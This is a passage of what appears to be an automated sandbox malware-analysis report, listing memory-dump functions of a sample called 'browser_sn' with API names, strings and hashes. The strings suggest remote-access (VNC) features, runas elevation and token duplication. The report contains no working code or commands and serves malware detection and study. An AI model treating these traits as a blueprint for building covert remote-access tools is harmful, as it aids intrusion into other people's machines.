                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                      • String ID: -startservice$p$runas
                                                      • API String ID: 3648085421-278061118
                                                      • Opcode ID: 926b2c35945988a05c881ee216fe9ef46aea1621d10afb6dfb6c9793bb67f9ef
                                                      • Instruction ID: c18a4b24684715a18ade81c6568f1e0ed36c0b86bee8bcf3871d111afc316c6f
                                                      • Opcode Fuzzy Hash: 926b2c35945988a05c881ee216fe9ef46aea1621d10afb6dfb6c9793bb67f9ef
                                                      • Instruction Fuzzy Hash: 3801A536628B8185E770AB30F49439AB3B4FB89748F801235D6CD02B58DF7DE158CB50
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                      • String ID: -install$p$runas
                                                      • API String ID: 3648085421-1683557327
                                                      • Opcode ID: da01a03551f4b71eee5f038ed1fd70f8f3551a75722601959108e33cdc7658fd
                                                      • Instruction ID: a2240b288396d32f417b50e91fca8c4fe23de7d258f7c803bbe47b8bb041b1f2
                                                      • Opcode Fuzzy Hash: da01a03551f4b71eee5f038ed1fd70f8f3551a75722601959108e33cdc7658fd
                                                      • Instruction Fuzzy Hash: 7D01A536628B8185E770AB30F49439AB3B4FB89748F801235D6CD02B58DF7DE158CB50
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                      • String ID: -securityeditor$p$runas
                                                      • API String ID: 3648085421-1380712588
                                                      • Opcode ID: 6428cee7919a180ae7089cf50127ee33227a6254b4296794cfa51c588de506a2
                                                      • Instruction ID: 0624555701ed9f05b59f1c7d2f72fac8302601a3c3c08333f869ee837377ec1e
                                                      • Opcode Fuzzy Hash: 6428cee7919a180ae7089cf50127ee33227a6254b4296794cfa51c588de506a2
                                                      • Instruction Fuzzy Hash: C601A536629B8185E770AB30F49439AB3B4FB89758F801235D6CD02B58DF7DE158CB50
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                      • String ID: -uninstall$p$runas
                                                      • API String ID: 3648085421-3602422011
                                                      • Opcode ID: 5574e6ddee382544abc3d2c84dae34c608b18e4d42992b9071503c0150b71b53
                                                      • Instruction ID: 1c1f65693f8489f106700d479f61305714892c5874e2f2159a8085dff2b7c6d7
                                                      • Opcode Fuzzy Hash: 5574e6ddee382544abc3d2c84dae34c608b18e4d42992b9071503c0150b71b53
                                                      • Instruction Fuzzy Hash: 7801A536628B8185E770AB30F49439AB3B4FB89748F801235D6CD02B58DF7DE158CB50
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: freemalloc
                                                      • String ID: vncencoder.cpp : failed to obtain colour map data!$vncencoder.cpp : generating 8-bit palette data$vncencoder.cpp : generating BGR233 palette data$vncencoder.cpp : remote palette data requested
                                                      • API String ID: 3061335427-2748099863
                                                      • Opcode ID: 63f80d4832f6e4566eecb43401796b936a332ff03a4846ba86bc6f35182ff0bb
                                                      • Instruction ID: 26fff8eddb9410d823d6036913bbbc0fb2d331f7ea71086215853f293b14edeb
                                                      • Opcode Fuzzy Hash: 63f80d4832f6e4566eecb43401796b936a332ff03a4846ba86bc6f35182ff0bb
                                                      • Instruction Fuzzy Hash: 3641E5A2A38A9342F734AB30A5013B9B761EF46744F841032EA4D47B9ADF3CF545D760
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %s:%s$Enter proxy authentication password for %s@%s: $Proxy-Authorization: Basic %s
                                                      • API String ID: 0-3750121419
                                                      • Opcode ID: dcac41199ae3c8df7bcab697df2315285d75f018ff24bfe801cf74db9f7aaf51
                                                      • Instruction ID: 4969350a527dfc0f871f373e8bb5dbad73eb50c2963a795e1e14ce011188b0de
                                                      • Opcode Fuzzy Hash: dcac41199ae3c8df7bcab697df2315285d75f018ff24bfe801cf74db9f7aaf51
                                                      • Instruction Fuzzy Hash: 52310422B2468144EB24EB76A8512E9A390EF4ABF4F941331EE3D47BD5DE3CE481C710
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Thread$CreateFileMessageModuleNamePlayPostResumeSound
                                                      • String ID:
                                                      • API String ID: 3945334538-0
                                                      • Opcode ID: 6ea77f1f998ec3782ac377f9155b0b4839ff24fcf66b865c59a37faa4ce68111
                                                      • Instruction ID: f55fb269fe4dce0d6a5a245952c362a568ec9087c72c041fc839698a223fb084
                                                      • Opcode Fuzzy Hash: 6ea77f1f998ec3782ac377f9155b0b4839ff24fcf66b865c59a37faa4ce68111
                                                      • Instruction Fuzzy Hash: 9841D326B2894191EB20AF35E4402BDA3A2FFC9BA8F945131DF5D03799DE3CE481C760
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _errno_invalid_parameter_noinfo$_fileno_ftbuf
                                                      • String ID:
                                                      • API String ID: 2434734397-0
                                                      • Opcode ID: fedb473ed8e07211a0b48662a4d4207601b42be0040328777e4ad7852e106941
                                                      • Instruction ID: a77cecbaf573b9cc64957e973e02a206015c6851ea3cc26ff8f4b028f7894d9b
                                                      • Opcode Fuzzy Hash: fedb473ed8e07211a0b48662a4d4207601b42be0040328777e4ad7852e106941
                                                      • Instruction Fuzzy Hash: 12315861A286024AEE74B77959912F9A2926F42BE0FD05231DD1E873D1DF2CFC41E220
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$Leave$EnterErrorExceptionLastObjectRaiseSingleValueWait
                                                      • String ID:
                                                      • API String ID: 824239979-0
                                                      • Opcode ID: 12bf6ecd7088038fd47cecf56f3922a6986b1dec9d24cf819874f6182f192e8f
                                                      • Instruction ID: aa117773dd65fd6fbca0cad0596e1766aa5fef6c5dfbdf83af372d37f34fc271
                                                      • Opcode Fuzzy Hash: 12bf6ecd7088038fd47cecf56f3922a6986b1dec9d24cf819874f6182f192e8f
                                                      • Instruction Fuzzy Hash: 62217122A38A4282EB61AF34D4451B9B3B0FF85784FC46531EA5E43759DF2CF445C720
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandleToken$OpenProcess$CreateDuplicateFirstInformationProcess32SnapshotToolhelp32
                                                      • String ID:
                                                      • API String ID: 3355884492-0
                                                      • Opcode ID: 6104325d5a1b9d43be635a96be43e70745f11669b1d82cc91958b0e9663c2412
                                                      • Instruction ID: 7c0b5341ec47493b84dc29f766bcf06ae407ffaf53e22758610940228dabf8a4
                                                      • Opcode Fuzzy Hash: 6104325d5a1b9d43be635a96be43e70745f11669b1d82cc91958b0e9663c2412
                                                      • Instruction Fuzzy Hash: 55215936B2C68282EB20AB35A844269E7B1BF89790F844135EA9D43B95DE7CE4458B11
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _errno_fileno_flush_freebuf_invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3613856401-0
                                                      • Opcode ID: 22e8c468e637d92c8e7f14c6622d0db4cac7223b0f4977f25baec7dc4bd546e1
                                                      • Instruction ID: 58d45004ba770e707c5d7d3a9009b30feb90eb4a440beb45f339ffc062295a4a
                                                      • Opcode Fuzzy Hash: 22e8c468e637d92c8e7f14c6622d0db4cac7223b0f4977f25baec7dc4bd546e1
                                                      • Instruction Fuzzy Hash: FD014F12E2868241FB74BA7598523FD91909F967A4FA90230EA2D463C3CE7CFC41B360
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DeleteObjectfree$ErrorFreeHeapLast_errno
                                                      • String ID:
                                                      • API String ID: 2426525106-0
                                                      • Opcode ID: 603f918af7fb599e57d4a8c5aa72689e5f4edbcd5d23c5f13df1708e76f5f105
                                                      • Instruction ID: b223f92d4c721b592039c4229e8a7915fe3b2552e76f3158a82211d12bfc574b
                                                      • Opcode Fuzzy Hash: 603f918af7fb599e57d4a8c5aa72689e5f4edbcd5d23c5f13df1708e76f5f105
                                                      • Instruction Fuzzy Hash: B0011262A68A41A7DA64FB36EA510B8B374FF89B80BC05031DA4D47771CF38F8A5C314
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DeleteObjectfree$ErrorFreeHeapLast_errno
                                                      • String ID:
                                                      • API String ID: 2426525106-0
                                                      • Opcode ID: 19dd2d2afd55e3adf8fb9d01f5eac84cc95537aa2f4af578a0b97840d6351f68
                                                      • Instruction ID: fd23b46a037a11da72da1909562e401cf52496b7d6a8a68c73a917416bb329e2
                                                      • Opcode Fuzzy Hash: 19dd2d2afd55e3adf8fb9d01f5eac84cc95537aa2f4af578a0b97840d6351f68
                                                      • Instruction Fuzzy Hash: 54011772624A4192D664FB36EA510B8B374FF89B80BC05031DA4D47761CF38F8B5C314
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DeleteObjectfree$ErrorFreeHeapLast_errno
                                                      • String ID:
                                                      • API String ID: 2426525106-0
                                                      • Opcode ID: 519421b3b674e42368a913bd218afa9024c234a5df41dca482dc94a54fba9521
                                                      • Instruction ID: 3636dd243e5ad42e68d324f14ad510c3fd9c22b9de95214c2cae5a471ec492e0
                                                      • Opcode Fuzzy Hash: 519421b3b674e42368a913bd218afa9024c234a5df41dca482dc94a54fba9521
                                                      • Instruction Fuzzy Hash: 1EF0DA62A64A4192EB64FF35EC510A8B334FF89F44BC05031C90D57365CF38E899C324
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
